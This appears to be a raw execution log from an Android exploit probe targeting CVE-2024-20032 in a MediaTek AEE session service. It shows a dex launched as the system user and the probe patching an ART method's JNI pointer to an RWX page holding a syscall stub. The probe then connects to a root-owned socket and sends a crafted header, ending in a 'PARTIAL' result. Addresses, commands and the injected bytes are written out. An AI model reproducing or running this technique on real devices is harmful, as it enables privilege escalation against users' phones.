command=CLASSPATH=/data/data/com.android.settings/cache/apusys_ioctl_probe.dex app_process64 /system/bin AeeSessionProbe 
probe=aee-session
dex_md5=1f539ab010edb2403a970cda7022cc2e
dex_sha256=c8a027f7f314d062acad20ea437c9dabbc06a419172206be463f37eea276000d
remote_dex=/data/data/com.android.settings/cache/apusys_ioctl_probe.dex
shell_port=127.0.0.1:48888
exit_status=0

uid=1000(system) gid=1000(system) groups=1000(system),3003(inet) context=u:r:system_app:s0
u:r:system_app:s0
1f539ab010edb2403a970cda7022cc2e  /data/data/com.android.settings/cache/apusys_ioctl_probe.dex
[AeeSessionProbe] CVE-2024-20032 session driver
[AeeSessionProbe] uid=1000 pid=22413 target_pid=22413 class=13 ind_cmd=12
[+] Scratch buffer at 0x7c3d1ff000
[*] Trying anonymous PROT_RWX mmap...
[+] Anonymous RWX page at 0x7c3d1fe000
[+] Wrote syscall stub: JNI@+0x00 (36B), call stub JNI@+0x80 (40B); entry_point left untouched
[*] ArtMethod for nativeSyscall at 0x7c322d7a20
    access_flags = 0x10000108 [NATIVE]
    data (JNI ptr) = 0x7987e1a2c0
    entry_point    = 0x10380008759bc358
[*] Patching data_ (JNI) → 0x7c3d1fe000
    data_       = 0x7c3d1fe000 ✓
    entry_point = 0x10380008759bc358 (unchanged)
[+] ArtMethod patched
[+] Syscall infrastructure ready

[phase1] connecting to @android:aee_aed
[+] connected, peer_uid=0
[phase2] sending AE_IND header (ind_cmd=12, pid=22413, class=13)
[+] IND sent: 02 00 00 00 0c 00 00 00 8d 57 00 00 0d 00 00 00 00 00 00 00 00 00 00 00
[phase3] entering REQ/RSP loop (max_reqs=30)
[loop] read timeout / EOF after 0 reqs
[done] session_done=false reqs_handled=0
[phase4] checking /data/vendor/aee_exp/ for new entry
[aee_exp] directory not accessible
[result] CVE_2024_20032=PARTIAL — connected but no REQs received
